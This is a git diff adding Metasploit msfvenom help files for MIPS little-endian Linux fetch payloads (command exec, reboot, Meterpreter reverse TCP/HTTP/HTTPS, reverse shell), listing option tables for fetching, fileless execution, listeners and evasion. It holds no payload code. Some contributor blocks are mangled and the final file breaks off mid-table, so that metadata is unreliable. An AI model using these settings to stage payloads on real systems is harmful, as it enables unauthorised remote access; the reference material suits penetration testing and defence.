+++ b/msfvenom/payload_options/cmd-linux-https-mipsle-exec.txt @@ -0,0 +1,75 @@ + + Name: HTTPS Fetch, Linux Execute Command + Module: payload/cmd/linux/https/mipsle/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + entropy + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ahLQgwLq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + + A very small shellcode for executing commands. + This module is sometimes helpful for testing purposes as well as + on targets with extremely limited buffer space. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..a475375 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter-reverse_tcp.txt @@ -0,0 +1,105 @@ + + Name: HTTPS Fetch, Reverse TCP Stager + Module: payload/cmd/linux/https/mipsle/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Norm +Evasion options for payload/cmd/linux/https/mipsle/meterpreter/reverse_tcp: +========================= + + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME JeVONKbzGYE no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_http.txt new file mode 100644 index 0000000..edeffb6 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_http.txt @@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mipsle/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/mipsle/meterpreter_reverse_http: +========================= + +k@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZKymOKKQKH no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_https.txt new file mode 100644 index 0000000..54c980b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_https.txt @@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mipsle/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/https/mipsle/meterpreter_reverse_https: +========================= + +rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME aGcQVAEyngN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..9203588 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsle-meterpreter_reverse_tcp.txt @@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/mipsle/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/mipsle/meterpreter_reverse_tcp: +========================= + +ook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME HuksXSRdq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-reboot.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-reboot.txt new file mode 100644 index 0000000..6d1f2ea --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsle-reboot.txt @@ -0,0 +1,73 @@ + + Name: HTTPS Fetch, Linux Reboot + Module: payload/cmd/linux/https/mipsle/reboot + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + rigan - + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME TdkqgYbz no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + + A very small shellcode for rebooting the system. + This payload is sometimes helpful for testing purposes. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-mipsle-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-mipsle-shell-reverse_tcp.txt new file mode 100644 index 0000000..b99f3e3 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-mipsle-shell-reverse_tcp.txt @@ -0,0 +1,96 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/https/mipsle/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME SUoSCWLEc no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSLE payload from an HTTPS server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- 